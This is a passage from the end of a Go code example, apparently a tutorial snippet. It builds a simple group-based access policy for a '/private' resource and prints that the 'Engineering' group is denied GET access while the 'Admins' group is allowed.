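	p := policy{
		{group: "Admins", resource: "/private", ops: map[string]bool{"GET": true}},
	}

	fmt.Println(p.check("Engineering", "GET", "/private")) // false -> access denied
	fmt.Println(p.check("Admins", "GET", "/private"))      // true  -> access allowed
}
```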